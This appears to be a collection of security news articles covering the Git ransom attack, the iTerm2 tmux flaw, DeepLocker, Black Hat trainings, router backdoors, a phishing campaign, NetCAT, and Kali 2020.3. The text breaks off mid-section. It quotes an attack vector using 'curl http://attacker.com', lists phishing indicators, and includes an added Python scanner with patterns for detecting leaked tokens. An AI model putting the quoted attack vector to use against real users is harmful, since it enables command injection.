Tech News - Security

470 Articles
Atlassian Bitbucket, GitHub, and GitLab take collective steps against the Git ransomware attack

Bhagyashree R
15 May 2019
4 min read

Yesterday, Atlassian Bitbucket, GitHub, and GitLab published a joint incident report in the wake of the recent Git ransomware attack on the three platforms earlier this month. The post sheds light on the details of the ransom event, the measures the platforms are taking to protect users, and the next steps to be taken by the affected repo owners.

https://twitter.com/github/status/1128332167229202433

The Git ransom attack

On May 2, the security teams at Atlassian Bitbucket, GitHub, and GitLab started getting numerous reports from users about their accounts being compromised. The reports mentioned that the source code from their repositories, both private and public, was being wiped and replaced with the following ransom note:

“To recover your lost data and avoid leaking it: Send us 0.1 Bitcoin (BTC) to our Bitcoin address 1ES14c7qLb5CYhLMUekctxLgc1FV2Ti9DA and contact us by Email at admin@gitsbackup.com with your Git login and a Proof of Payment. If you are unsure if we have your data, contact us and we will send you a proof. Your code is downloaded and backed up on our servers. If we don't receive your payment in the next 10 Days, we will make your code public or use them otherwise.”

The user accounts were compromised with legitimate user credentials, including passwords, app passwords, API keys, and personal access tokens. After getting access to the user accounts, the attackers performed command-line Git commits, which overwrote the source code in the repositories with the ransom note.

To recover your repository, if you have its latest copy on your computer, you can force push the local copy to the current HEAD using the ‘git push origin HEAD:master --force’ command. If not, you can clone the repository and use the git reflog or git fsck commands to find your last commit and change the HEAD.

What the investigation revealed

A basic GitHub search shows that 267 repositories were affected by the ransom attack. While investigating how the credential leakage happened, the security teams found a public third-party credential dump, which was hosted by the same hosting provider where the attack had originated. The dump had credentials of nearly one-third of the attacked accounts. After finding this out, the platforms took steps to invalidate the credentials by resetting or revoking them.

On further investigation, it was found that continuous scanning had been conducted from the same IP address as the attacker for publicly exposed .git/config and other environment files, which may contain sensitive information like credentials and personal access tokens. Similar scanning behavior from other IPs residing on the same hosting provider was also found.

How you can protect your repositories from such attacks

Strong and unique passwords: Users should use strong and unique passwords, as attackers can easily crack simple passwords through brute-force attacks.

Enabling multi-factor authentication (MFA): Users are recommended to use multi-factor authentication, which is supported on all three platforms. MFA provides better security by combining two or more independent credentials for authentication.

Understanding personal access tokens (PATs) and their risks: PATs serve as an alternative to passwords when you are using two-factor authentication. Users should ensure that these are not publicly accessible in repositories or on web servers, as in some situations these tokens may have read or write access to repositories. The report further recommends that users use them as environment variables and avoid hardcoding them into their programs.

Additionally, the three platforms also offer other features through which such attacks can be prevented from recurring. Bitbucket gives admins the authority to control user access through IP Whitelisting on their Premium plan. GitHub does token scanning on public repositories to check for known token formats and notifies the service providers if secrets are published to public GitHub repositories. GitLab 11.9 comes with a feature called Secret Detection that scans repositories to find API keys and other information that should not be there.

To read the official announcement, check out the joint incident report on the GitLab blog.
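The two defensive measures described above, scanning for known token formats and taking tokens from environment variables instead of source, as an added Python illustration. This is not GitHub's token scanning, GitLab's Secret Detection, or any code from the incident report: the regexes are simplified, assumed shapes of a few well-known formats (a real scanner carries a far larger rule set), the environment variable names are assumed, and the sample files are constructed.

```python
"""Flag hardcoded credentials in known token formats before they are committed.

Added illustration of the report's recommendations, not the platforms' own
scanners. Patterns are simplified shapes of well-known formats (assumption).
"""
import os
import re
from typing import Dict, List, Mapping, NamedTuple, Optional


class Finding(NamedTuple):
    path: str
    line_no: int
    kind: str
    redacted: str  # a short prefix only; the full secret is never reported


# Ordered: specific formats first, the generic heuristic last. Each regex is an
# assumed, simplified shape; the generic rule catches secret-looking names
# (token, secret, password, api_key) assigned a quoted literal of 8+ characters.
TOKEN_PATTERNS = [
    ("aws_access_key_id", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("github_pat", re.compile(r"\bghp_[A-Za-z0-9]{36}\b")),
    ("private_key_block", re.compile(r"-----BEGIN (?:[A-Z]+ )?PRIVATE KEY-----")),
    ("generic_assignment", re.compile(
        r"(?i)\w*(?:token|secret|password|api[_-]?key)\w*\s*[:=]\s*['\"]([^'\"]{8,})['\"]")),
]


def redact(secret: str) -> str:
    """Keep four characters so the finding can be located without re-exposing it."""
    return secret[:4] + "..."


def scan_text(path: str, text: str) -> List[Finding]:
    """Return one finding per line, using the most specific matching pattern."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in TOKEN_PATTERNS:
            match = pattern.search(line)
            if match:
                # For the generic rule, group 1 is the literal; otherwise the whole match.
                secret = match.group(match.lastindex or 0)
                findings.append(Finding(path, line_no, kind, redact(secret)))
                break
    return findings


def scan_files(files: Dict[str, str]) -> List[Finding]:
    """Scan a mapping of path -> contents (for example the files staged for a commit)."""
    results: List[Finding] = []
    for path, text in files.items():
        results.extend(scan_text(path, text))
    return results


def token_from_env(var_name: str, env: Optional[Mapping[str, str]] = None) -> str:
    """The report's recommendation: read tokens from the environment, never from source.

    Refuses to run with a missing variable rather than falling back to a literal.
    """
    if env is None:
        env = os.environ
    value = env.get(var_name)
    if not value:
        raise RuntimeError(f"{var_name} is not set; refusing to fall back to a hardcoded token")
    return value


# Constructed sample files (not real credentials): the AWS key is the AWS
# documentation placeholder and the GitHub token is a made-up string.
SAMPLE_FILES = {
    "config.py": (
        'GITHUB_TOKEN = "ghp_0123456789abcdefghijABCDEFGHIJ012345"\n'
        'DB_HOST = "localhost"\n'
    ),
    "deploy.sh": "export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n",
    "settings.py": 'DATABASE_PASSWORD = "correct-horse-battery"\n',
    "app.py": 'token = os.environ["GITHUB_TOKEN"]\n',  # the recommended pattern: no finding
}


if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f.path}:{f.line_no}: {f.kind} ({f.redacted})")
```

Run as a pre-commit hook or in CI over the staged files, a non-empty result from scan_files should fail the commit; app.py produces no finding because the token is read from the environment, which is exactly the pattern the report recommends.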

Mozilla’s sponsored security audit finds a critical vulnerability in the tmux integration feature of iTerm2

Vincy Davis
10 Oct 2019
3 min read

Yesterday, Mozilla announced that a critical security vulnerability is present in the terminal multiplexer (tmux) integration feature in all versions of iTerm2, the GPL-licensed terminal emulator for macOS. The vulnerability was found by a sponsored security audit conducted by the Mozilla Open Source Support Program (MOSS), which delivers security audits for open source technologies. Mozilla and iTerm2’s developer George Nachman have together developed and released a patch for the vulnerability in iTerm2 version 3.3.6.

Read Also: MacOS terminal emulator, iTerm2 3.3.0 is here with new Python scripting API, a scriptable status bar, Minimal theme, and more

According to the official blog post, MOSS sponsored the iTerm2 security audit due to its popularity among developers and system administrators. Another major reason was iTerm2’s processing of untrusted data. Radically Open Security (ROS), the firm that conducted the audit, has ascertained that this vulnerability had been present in iTerm2 for the last 7 years.

An attacker can exploit this vulnerability (CVE-2019-9535) by producing malicious output to the terminal using commands on the targeted user’s computer, or by remotely executing arbitrary commands with the privileges of the targeted user. Tom Ritter of Mozilla says, “Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative examples.”

Nachman says that this is a serious vulnerability because “in some circumstances, it could allow an attacker to execute commands on your machine when you view a file or otherwise receive input they have crafted in iTerm2.” He also strongly recommended that all users upgrade their iTerm2 to the latest 3.3.6 version.

The CERT Coordination Center has pointed out that since the tmux integration cannot be disabled through configuration, a complete resolution to this vulnerability is not yet available.

Users have appreciated both Mozilla and the iTerm2 team for the security update. A user commented on Hacker News, “I checked for update, installed and relaunched... and found that all my tabs were exactly as they were before, including my tab that had an ssh tunnel running. The only thing that changed was that iTerm got more secure. Impressive work, Nachman.” Another user says, “Thank you, Mozilla. =)”

Visit the Mozilla blog for more details about the vulnerability.

IBM’s DeepLocker: The Artificial Intelligence powered sneaky new breed of Malware

Melisha Dsouza
13 Aug 2018
4 min read

In the newfound age of Artificial Intelligence, where everything and everyone uses Machine Learning concepts to make life easier, the dark side of the same can be left unexplored. Cybersecurity is gaining a lot of attention these days. The most influential organizations have experienced a downfall because of undetected malware that has managed to evade even the most secure cyber defense mechanisms. The job just got easier for cyber criminals who exploit AI to empower themselves and launch attacks. Imagine combining AI with cyber attacks!

At last week’s Black Hat USA 2018 conference, IBM researchers presented their newly developed malware “DeepLocker”, which is backed by AI. Weaponized AI seems here to stay.

Read Also: Black Hat USA 2018 conference Highlights for cybersecurity professionals

All you need to know about DeepLocker

Simply put, DeepLocker is a new generation of malware which can stay under the radar and go undetected till its target is reached. It uses an Artificial Intelligence model to identify its target using indicators like facial recognition, geolocation and voice recognition, all of which are easily available on the web these days! What’s interesting is that the malware can hide its malicious payload in carrier applications, like video conferencing software, and go undetected by most antivirus and malware scanners until it reaches specific victims.

Imagine sitting at your computer performing daily tasks. Considering that your profile pictures are available on the internet, your video camera can be manipulated to find a match to your online picture. Once the target (your face) is identified, the malicious payload can be unleashed, thanks to your face serving as the key to unlock the virus. This simple “trigger condition” to unlock the attack is almost impossible to reverse engineer. The malicious payload will only be unlocked if the intended target is reached. It achieves this by using a deep neural network (DNN) AI model. The simple “if this, then that” trigger condition used by DeepLocker is transformed into a deep convolutional network of the AI model.

[Figure: DeepLocker – AI-Powered Concealment. Source: SecurityIntelligence]

DeepLocker makes it really difficult for malware analysts to answer the 3 main questions:
• What target is the malware after? Is it after people’s faces or some other visual clues?
• What specific instance of the target class is the valid trigger condition?
• What is the ultimate goal of the attack payload?

Now that’s some commendable work done by the IBM researchers. IBM has always strived to make a mark in the field of innovation. DeepLocker comes as no surprise, as IBM has the highest number of facial recognition patents granted in 2018.

BlackHat USA 2018 sneak preview

The main aim of the IBM researchers Marc Ph. Stoecklin, Jiyong Jang and Dhilung Kirat in briefing the crowd at the BlackHat USA 2018 conference was:
• To raise awareness that AI-powered threats like DeepLocker can be expected very soon
• To demonstrate how attackers have the capability to build stealthy malware that can circumvent defenses commonly deployed today, and
• To provide insights into how to reduce risks and deploy adequate countermeasures.

To demonstrate the efficiency of DeepLocker’s capabilities, they designed and demonstrated a proof of concept. The WannaCry virus was camouflaged in a benign video conferencing application so that it remained undetected by antivirus engines and malware sandboxes. As a triggering condition, an individual was selected, and the AI was trained to launch the malware when certain conditions, including the facial recognition of the target, were met. The experiment was, undoubtedly, a success. DeepLocker is just an experiment by IBM to show how open-source AI tools can be combined with straightforward evasion techniques to build targeted, evasive and highly effective malware.

As the world of cybersecurity is constantly evolving, security professionals will now have to up their game to combat hybrid malware attacks.

Found this article interesting? Read the Security Intelligence blog to discover more.

7 Black Hat USA 2018 conference cybersecurity training highlights: Hardware attacks, IO campaigns, Threat Hunting, Fuzzing, and more

Melisha Dsouza
11 Aug 2018
7 min read

The 21st International Conference of Black Hat USA 2018 has just concluded. It took place from August 4, 2018 to August 9, 2018 in Las Vegas, Nevada. It is one of the most anticipated conferences of the year for security practitioners, executives, business developers and anyone who is a cybersecurity fanatic and wants to expand their horizon into the world of security. Black Hat USA 2018 opened with four days of technical training followed by the two-day main conference featuring Briefings, Arsenal, Business Hall, and more.

The conference covered exclusive training modules that provided a hands-on offensive and defensive skill set building opportunity for security professionals. The Briefings covered the nitty-gritty of all the latest trends in information security. The Business Hall included a network of more than 17,000 InfoSec professionals who evaluated a range of security products offered by Black Hat sponsors.

Best cybersecurity trainings in the conference

For more than 20 years, Black Hat has been providing its attendees with trainings that stand the test of time and prove to be an asset in penetration testing. The training modules designed exclusively for Black Hat attendees are taught by industry and subject matter experts from all over the world with the goal of shaping the information security landscape. Here’s a look at a few from this year’s conference.

#1 Applied Hardware Attacks: Embedded and IoT systems

This hands-on training was headed by Josh Datko and Joe Fitzpatrick and:
• Introduced students to the common interfaces on embedded MIPS and ARM systems
• Taught them how to exploit physical access to grant themselves software privilege
• Focussed on UART, JTAG, and SPI interfaces
Students were given a brief architectural overview. 70% of the course was hands-on labs: identifying, observing, interacting with, and eventually exploiting each interface. Basic analysis and manipulation of firmware images were also covered.

This two-day course was geared toward pen testers, red teamers, exploit developers, and product developers who wished to learn how to take advantage of physical access to systems to assist and enable other attacks. This course also aimed to help security researchers and enthusiasts who are unwilling to 'just trust the hardware' gain deeper insight into how hardware works and can be undermined.

#2 Information Operations: Influence, exploit, and counter

This fast-moving class included hands-on exercises to apply and reinforce the skills learned during the course of the training. It also included a best IO campaign contest, which was conducted live during the class. Trainers David Raymond and Gregory Conti covered information operations theory and practice in depth. Some of the main topics covered were IO Strategies and Tactics, Countering Information Operations, and Operations Security and Counter Intelligence. Attendees learned about Online Personas and explored the use of bots and AI to scale attacks and defenses. Other topics included understanding performance and assessment metrics, how to respond to an IO incident, exploring the concepts of Deception and counter-deception, and Cyber-enabled IO.

#3 Practical Vulnerability Discovery with Fuzzing

Abdul Aziz Hariri and Brian Gorenc trained students on techniques to quickly identify common patterns in specifications that produce vulnerable conditions in the network. The course covered the following:
• Learning the process to build a successful fuzzer, and highlighting public fuzzing frameworks that produce quality results
• “Real world” case studies that demonstrated the fundamentals being introduced
• Leveraging existing fuzzing frameworks, developing their own test harnesses, integrating publicly available data generation engines and automating the analysis of crashing test cases
This class was aimed at individuals wanting to learn the fundamentals of the fuzzing process, develop advanced fuzzing frameworks, and/or improve their bug finding capabilities.

#4 Active Directory Attacks for Red and Blue Teams

Nikhil Mittal’s main aim in conducting the training was to change how you test an Active Directory environment. To secure Active Directory, it is important to understand the different techniques and attacks used by adversaries against it. AD environments lack the ability to tackle the latest threats. Hence, this training was aimed at attacking a modern AD environment using built-in tools like PowerShell and other trusted OS resources. The training was based on real-world penetration tests and Red Team engagements for highly secured environments. Some of the techniques covered in the course were:
• Extensive AD Enumeration
• Active Directory trust mapping and abuse
• Privilege Escalation (User Hunting, Delegation issues and more)
• Kerberos Attacks and Defense (Golden, Silver ticket, Kerberoast and more)
• Abusing cross-forest trust (Lateral movement across forest, PrivEsc and more)
• Attacking Azure integration and components
• Abusing SQL Server trust in AD (Command Execution, trust abuse, lateral movement)
• Credentials Replay Attacks (Over-PTH, Token Replay etc.)
• Persistence (WMI, GPO, ACLs and more)
• Defenses (JEA, PAW, LAPS, Deception, App Whitelisting, Advanced Threat Analytics etc.)
• Bypassing defenses
Attendees also acquired free one-month access to an Active Directory environment comprising multiple domains and forests, during and after the training.

#5 Hands-on Power Analysis and Glitching with ChipWhisperer

This course was suited for anyone dealing with embedded systems who needed to understand the threats that can be used to break even a "perfectly secure" system. Side-Channel Power Analysis can be used to read out an AES-128 key in less than 60 seconds from a standard implementation on a small microcontroller. Colin O'Flynn helped the students understand whether their systems were vulnerable to such an attack or not. The course was loaded with hands-on examples to teach them about attacks and theories. The course included a ChipWhisperer-Lite, so students could walk away with the hardware provided during the lab sessions. During the two-day course, topics covered included:
• Theory behind side-channel power analysis
• Measuring power in existing systems
• Setting up the ChipWhisperer hardware & software
• Several demonstrated attacks
• Understanding and demonstrating glitch attacks, and
• Analyzing your own hardware

#6 Threat Hunting with Attacker TTPs

A proper Threat Hunting program focused on maximizing the effectiveness of scarce network defense resources to protect against a potentially limitless threat was the main aim of this class. Threat Hunting takes a different perspective on performing network defense, relying on skilled operators to investigate and find the presence of malicious activity. This training used standard network defense and incident response (which target flagging known malware) and focussed on abnormal behaviors and the use of attacker Tactics, Techniques, and Procedures (TTPs). Trainers Jared Atkinson, Robby Winchester and Roberto Rodriquez taught students how to create threat hunting hypotheses based on attacker TTPs to perform threat hunting operations and detect attacker activity. In addition, they used free and open source data collection and analysis tools (Sysmon, ELK and the Automated Collection and Enrichment Platform) to gather and analyze large amounts of host information to detect malicious activity. They used these techniques and toolsets to create threat hunting hypotheses and perform threat hunting in a simulated enterprise network undergoing active compromise from various types of threat actors. The class was intended for defenders wanting to learn how to effectively hunt threats in enterprise networks.

#7 Hands-on Hardware Hacking Training

The class, taught by Joe Grand, took the students through the process of reverse engineering and defeating the security of electronic devices. The comprehensive training covered:
• Product teardown
• Component identification
• Circuit board reverse engineering
• Soldering and desoldering
• Signal monitoring and analysis, and memory extraction, using a variety of tools including a logic analyzer, multimeter, and device programmer
It concluded with a final challenge where attendees identify, reverse engineer, and defeat the security mechanism of a custom embedded system. Those interested in hardware hacking, including security researchers, digital forensic investigators, design engineers, and executive management, benefitted from this class.

And that’s not all! Some other trainings included Software Defined Radio, a guide to threat hunting utilizing the ELK stack and machine learning, AWS and Azure exploitation: making the cloud rain shells, and much more.

This is just a brief overview of the BlackHat USA 2018 conference, where we have handpicked a select few trainings. You can see the full schedule along with the list of selected research papers at the BlackHat Website. And if you missed out on this one, fret not. There is another conference happening soon, from 3rd December to 6th December 2018. Check out the official website for details.

Cisco and Huawei Routers hacked via backdoor attacks and botnets

Savia Lobo
23 Jul 2018
5 min read

In today’s world, organizations and companies go to great lengths to protect themselves from network breaches. However, even a pinhole is enough for attackers to intrude into any system. Last week, routers by Cisco and Huawei were hacked by two separate groups using different methods. Cisco’s routers were hacked using a backdoor attack, while Huawei routers were exploited using code for a much older vulnerability.

An abnormal rise in Cisco router backdoors

In 2004, Cisco wrote the IETF proposal for a “lawful intercept” backdoor for their routers. This proposal stated that law enforcement teams could use the intercept to remotely log in to routers. These routers, which are sold to ISPs and other large enterprises, would allow law enforcement agents to wiretap IP networks. These law enforcement agents are supposed to gain such access only via a court order or other legal access request.

A backdoor is a malware type which can bypass the normal authentication process for accessing any system or application. Some backdoors are legitimate and assist, for instance, manufacturers to regain lost passwords. However, these backdoors can be used by attackers to remotely access systems without anyone on the system knowing it.

However, later, in 2010, an IBM security researcher stated that such a protocol would give easy access to malicious attackers, who would take over Cisco IOS routers. The ISPs related to these routers would also end up being hacked. Undocumented backdoors were discovered in 2013, 2014, 2015, and 2017. According to Tom’s Hardware, this year alone, Cisco recorded five different backdoors within their routers, which resulted in a security flaw for the company’s routers. Let’s have a look at the list of undocumented backdoors found and when.

• March recorded two backdoors. Firstly, a hardcoded account with the username ‘cisco’, which would have provided remote intrusion into more than 8.5 million Cisco routers and switches. Another hardcoded password was found for Cisco's Prime Collaboration Provisioning (PCP) software. This software is used for the remote installation of Cisco voice and video products.
• May revealed another backdoor in Cisco’s Digital Network Architecture (DNA) Center. This center is used by enterprises to provision devices across a network.
• Further, in June, a backdoor account was found in Cisco’s Wide Area Application Services (WAAS). Note that this is a software tool for traffic optimization in the Wide Area Network (WAN).
• The most recent backdoor, found this month, was in the Cisco Policy Suite, which is a software suite for ISPs and large companies that can manage a network’s bandwidth policies. Using this backdoor, an attacker gets root access to the network with no mitigations against it. However, this backdoor has been patched with Cisco’s software update.

The question that arises from these incidents is whether these backdoors were created accidentally or actually by intruders. The recurrence of such incidents does not paint a good picture of Cisco as a responsible, reliable and trustworthy network for end users.

Botnet built in a day brings down Huawei routers

Researchers from NewSky Security spotted a new botnet last week, which enslaved nearly 18,000 Huawei IoT devices within a day.

Botnets are huge networks of enslaved devices and can be used to perform distributed denial-of-service (DDoS) attacks, send malicious packets of data to a device, and remotely execute code.

The most striking feature of this huge botnet is that it was built within a day and with a previously known vulnerability, CVE-2017-17215. This botnet was created by a hacker nicknamed Anarchy, says Ankit Anubhav, security researcher at NewSky Security. Anubhav said, “It's painfully hilarious how attackers can construct big bot armies with known vulns.” Other security firms including Rapid7 and Qihoo 360 Netlab also confirmed the existence of this new botnet. They first noticed a huge increase in Huawei device scanning.

Anubhav states that the hacker revealed to him an IP list of victims. This list has not been made public yet. He further adds that the same code was released publicly in January this year. The same code was used in the Satori and Brickerbot botnets, and also within other botnets based on Mirai (Mirai botnets were used in 2016 to disrupt Internet services across the US on a huge scale). The NewSky security researcher suspects that Anarchy may be the same hacker known as Wicked, who was linked with the creation of the Owari/Sora botnets. Moreover, Anarchy/Wicked told the researcher that they also plan to start a scan for the Realtek router vulnerability CVE-2014-8361, in order to enslave more devices. After receiving such a warning from the hacker himself, what new security measures will be taken henceforth?

Read more about this Huawei botnet attack on ZDNet.

Mobile-aware phishing campaign targets UNICEF, the UN, and many other humanitarian organizations

Savia Lobo
30 Oct 2019
2 min read

A few days ago, researchers from Lookout Phishing AI reported a mobile-aware phishing campaign that targets non-governmental organizations around the world, including UNICEF, a variety of United Nations humanitarian organizations, the Red Cross and UN World Food, among others. The company has also contacted law enforcement and the targeted organizations.

“The campaign is using landing pages signed by SSL certificates, to create legitimate-looking Microsoft Office 365 login pages,” Threatpost reports.

According to the Lookout Phishing AI researchers, “The infrastructure connected to this attack has been live since March 2019. Two domains have been hosting phishing content, session-services[.]com and service-ssl-check[.]com, which resolved to two IPs over the course of this campaign: 111.90.142.105 and 111.90.142.91. The associated IP network block and ASN (Autonomous System Number) is understood by Lookout to be of low reputation and is known to have hosted malware in the past.”

The researchers have also detected very interesting techniques used in this campaign. It quickly detects mobile devices and logs keystrokes directly as they are entered in the password field. Simultaneously, the JavaScript code logic on the phishing pages delivers device-specific content based on the device the victim uses. “Mobile web browsers also unintentionally help obfuscate phishing URLs by truncating them, making it harder for the victims to discover the deception,” Jeremy Richards, Principal Security Researcher at Lookout Phishing AI, wrote in his blog post.

Further, the SSL certificates used by the phishing infrastructure had two main ranges of validity: May 5, 2019 to August 3, 2019, and June 5, 2019 to September 3, 2019. The Lookout researchers said that currently, six certificates are still valid. They also suspect that these attacks may still be ongoing.

Alexander García-Tobar, CEO and co-founder of Valimail, told Threatpost via email, “By using deviously coded phishing sites, hackers are attempting to steal login credentials and ultimately seek monetary gain or insider information.”

To know more about this news in detail, read Lookout’s official blog post.

Intel’s DDIO and RDMA enabled microprocessors vulnerable to new NetCAT attack

Vincy Davis
13 Sep 2019
5 min read

Two days ago, Intel disclosed a vulnerability in its line of microprocessors released since 2011 that feature Data Direct I/O Technology (DDIO) and Remote Direct Memory Access (RDMA). The vulnerability was found by a group of researchers from the Vrije Universiteit Amsterdam and ETH Zurich, who present a detailed security analysis of the attack in their paper, NetCAT: Practical Cache Attacks from the Network. The analysis is based on reverse engineering the behavior of DDIO, also called Direct Cache Access (DCA), on recent Intel processors. It resulted in the discovery of the first network-based PRIME+PROBE cache attack, named NetCAT.

NetCAT enables attacks in both cooperative and general adversarial settings. In the cooperative setting, an attacker can build a covert channel between a network client and a sandboxed server process that has no network access. In the general adversarial setting, an attacker can disclose sensitive information through network timing.

On June 23, 2019, the researchers coordinated the disclosure process with Intel and NCSC (the Dutch national CERT). Intel acknowledged the vulnerability with a bounty and has assigned CVE-2019-11184 to track the issue.

What is a NetCAT attack?

The threat model in the paper targets victim servers with DDIO-equipped Intel processors; DDIO has been enabled by default on Intel server-grade processors since 2012. The cache attack is conducted over the network against a target server, so that secret information can be leaked from the connection between the server and a different client. The researchers say there are many potential ways to exploit DDIO. The paper states, “For instance, an attacker with physical access to the victim machine could install a malicious PCIe device to directly access the LLC’s DDIO region. Our aim in this paper is to show that a similar attack is feasible even for an attacker with only remote (unprivileged) network access to the victim machine, without the need for any malicious PCIe devices.”

The threat model uses the RDMA capability of modern NICs to bypass the operating system at the data plane, which gives remote machines direct read and write access to a previously specified memory region. The figure in the original article illustrates the model’s target topology, which is also common in data centers.

(Figure: target topology of the threat model. Image source: NetCAT: Practical Cache Attacks from the Network.)

To launch the remote PRIME+PROBE attack, the researchers use the remote read/write primitives provided by the PCIe device’s DDIO capabilities to measure cache activity remotely. The paper explains two cooperative DDIO-based attacks: in the first scenario, a covert channel is built between two clients that are not on the same network; in the second, a covert channel is built between a client and a sandboxed process on a server. In both scenarios, the transmission rounds are loosely synchronized with a predefined time window.

In the keystroke-timing scenario, the attacker controls a machine with an RDMA link to an application server and uses remote PRIME+PROBE to detect network activity in the LLC, as shown in the figure. A user then opens an interactive SSH session to the application server from a different machine. In an interactive SSH session, each keystroke is sent in a separate packet, so the attacker can recover the inter-packet times from the cache activity at the ring buffer location and map them to keystrokes. The security analysis explored the implications of the NetCAT attack and showed that the DDIO feature on modern Intel CPUs does expose the system to cache attacks over the network.

The researchers write: “We have merely scratched the surface of possibilities for network-based cache attacks, and we expect similar attacks based on NetCAT in the future. We hope that our efforts caution processor vendors against exposing microarchitectural elements to peripherals without a thorough security design to prevent abuse.”

A video demonstrating the NetCAT attack: https://www.youtube.com/watch?v=QXut1XBymAk

The paper also discusses other NetCAT-like attacks, such as PCIe-to-CPU attacks, which may generalize beyond the given proof-of-concept scenarios, and it explains possible mitigations against these last-level cache side-channel attacks from PCIe devices, such as disabling DDIO, LLC partitioning, and improvements to DDIO itself.

With repeated vulnerabilities being found in Intel processors, many are beginning to distrust Intel, and some are even considering moving to alternatives. A Redditor comments, “Another one? Come on man, my i7 2600k already works like crap, and now another vulnerability that surely will affect performance via patches appeared? It is settled, next month I'm ditching Intel.” Another comment reads, “Soooo the moral of the story is, never buy Intel chips.”

For more information about the attack, interested readers can head over to the NetCAT: Practical Cache Attacks from the Network paper.

Introducing SaltStack Protect, a new SecOps solution for automated discovery and remediation of security vulnerabilities

Fatema Patrawala
21 Nov 2019
3 min read

On Tuesday, SaltStack, the creators of intelligent automation for IT operations and security teams, announced the general availability of SaltStack Protect. SaltStack Protect is for automated discovery and remediation of security vulnerabilities across web-scale infrastructure. It is a new product in the SaltStack SecOps family of products and an addition to SaltStack Comply. SaltStack Comply automates the work of continuous compliance and has been updated with new CIS Benchmark content and a new SDK for the creation of custom security checks. The SaltStack SecOps products provide a collaborative platform for both security and IT operations teams to help customers break down organizational silos and offset security and IT skills gaps and talent shortages.

“The massive amount of coordination and work required to actually fix thousands of infrastructure security vulnerabilities as quickly as possible is daunting. Vulnerability assessment and management tools require integrated and automated remediation to close the loop on IT security. SaltStack Protect gives security operations teams the power to control, optimize, and secure the entirety of their IT infrastructure while helping teams collaborate to mitigate risk,” said Marc Chenn, SaltStack CEO.

Key features in SaltStack Protect

As per the team, SaltStack Protect automates the remediation of vulnerabilities by delivering closed-loop workflows to scan, detect, prioritize, and fix critical security threats. Other capabilities include:

- Native CVE scanning – SaltStack Protect scans both on-premise and cloud systems to detect threats based on more than 12,000 CVEs across operating systems and infrastructure.
- Intelligent vulnerability prioritization – To assess and prioritize threats for remediation, SaltStack collects real-time data on the configuration state of every asset in an environment and combines it with vulnerability information from SaltStack Protect to accurately differentiate vulnerabilities that are exploitable from those that are not.
- Automated remediation – SaltStack Protect brings the power of automation to SecOps teams with an API-first solution that scans IT systems for vulnerabilities and then provides out-of-the-box automation workflows to remediate them.

As per the company, SaltStack SecOps products are built on SaltStack Enterprise, delivering a single platform for frictionless collaboration between security and IT teams. The company says this has resulted in users seeing a 95% decrease in the time required to find and fix critical vulnerabilities. Traditional security scanning tools report vulnerabilities that operations teams must investigate, prioritize, test, fix, and then report back to security; SaltStack eliminates nearly all the manual steps associated with vulnerability remediation, potentially saving time, resources, and redundant tools. SaltStack is used by many IT operations, DevOps and site reliability engineering organizations around the world, such as IBM Cloud, eBay, and TD Bank.

If you are interested in knowing more about this news, check out their official blog post. Additionally, SaltStack Comply and SaltStack Protect are also available via subscription, and you can schedule a trial demo too.

Kali Linux 2020.3 Release (ZSH, Win-Kex, HiDPI & Bluetooth Arsenal) from Kali Linux

Matthew Emerick
18 Aug 2020
12 min read

It’s that time of year again, time for another Kali Linux release! Quarter #3 – Kali Linux 2020.3. This release has various impressive updates, all of which are ready for immediate download or updating.

A quick overview of what’s new since the last release in May 2020:

- New Shell – Starting the process to switch from “Bash” to “ZSH”
- The release of “Win-Kex” – Get ready WSL2
- Automating HiDPI support – Easy switching mode
- Tool Icons – Every default tool now has its own unique icon
- Bluetooth Arsenal – New set of tools for Kali NetHunter
- Nokia Support – New devices for Kali NetHunter
- Setup Process – No more missing network repositories and quicker installs

New Shell (Is Coming)

Most people who use Kali Linux (we hope) are very experienced Linux users. As a result, they feel very comfortable around the command line. We understand that “shells” are a very personal and precious thing to everyone (local or remote!), as that is how most people interact with Kali Linux. To the point where lots of experienced users only use a “GUI” to spin up multiple terminals.

By default, Kali Linux has always used “bash” (aka “Bourne-Again SHell”) as the default shell when you open up a terminal or console. Any seasoned Kali user would know the prompt kali@kali:~$ (or root@kali:~# for the older users!) very well!

Today, we are announcing the plan to switch over to the ZSH shell. This is currently scheduled to be the default shell in 2020.4 (for this 2020.3 release, bash will still be the default). If you have a fresh default install of Kali Linux 2020.3, you should have ZSH already installed (if not, do sudo apt install -y zsh zsh-syntax-highlighting zsh-autosuggestions), ready for a try. However, if you installed an earlier version of Kali Linux and have upgraded to 2020.3, your user will be lacking the default ZSH configuration that we cooked with lots of love. So for upgrade users only, make sure to copy the configuration file:

kali@kali:~$ cp /etc/skel/.zshrc ~/
kali@kali:~$

Then all you need to do is switch to ZSH:

kali@kali:~$ zsh
┌──(kali㉿kali)-[~]
└─$

If you like what you see, you can set ZSH as your default (replacing bash) by doing chsh -s /bin/zsh. Which is what we will be doing in 2020.4.

We wanted to give the community notice before this switch happens. This is a very large change (some may argue larger than the Gnome to Xfce switch last year). We are also looking for feedback. We hope we have the right balance of design and functionality, but we know these typically don’t get done perfectly the first time. And we don’t want to overload the default shell with too many features, as lower powered devices will then struggle or it may be hard on the eyes to read.

ZSH has been something we have wanted to do for a long time (even before the switch over to Xfce!). We will be doing extensive testing during this next cycle, so we reserve the right to delay the default change, or change direction altogether. Again, we encourage you to provide feedback on this process. There is no way we can cover every use case on our own, so your help is important.

Q.) Why did you make the switch? What’s wrong with bash?
A.) You can do a lot of advanced things with bash, and customize it to do even more, but ZSH allows you to do even more. This was one really large selling point.

Q.) Why did you pick ZSH and not fish?
A.) In the discussion of switching shells, one of the options that came up is Fish (Friendly Interactive SHell). Fish is a nice shell (probably nicer than ZSH), but realistically it was not a real consideration due to the fact that it is not POSIX compatible. This would cause a lot of issues, as common one-liners just won’t work.

Q.) Are you going to use any ZSH frameworks (e.g. Oh-My-ZSH or Prezto)?
A.) At this point in time, by default, no. The weight of these would not be workable for lower powered devices. You can still install them yourself afterwards (as many of our team do).

Win-KeX

